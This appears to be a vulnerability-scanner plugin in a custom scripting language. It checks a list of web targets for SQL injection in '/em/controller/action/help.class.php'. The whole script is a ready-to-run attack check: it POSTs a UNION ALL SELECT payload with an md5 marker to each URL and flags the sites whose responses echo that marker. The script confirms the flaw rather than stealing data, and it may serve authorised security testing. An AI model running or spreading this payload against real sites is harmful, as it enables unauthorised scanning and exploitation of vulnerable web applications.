#request urls = array
#define payload = /user/?q=help&type=search&page=1&kw=
#define bug = 5d975967029ada386ba2980a04b7720e
#define info = /em/controller/action/help.class.php SQL Injection
#define post = ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5(360213360213),NULL

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpPost(url.payload,post."#","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
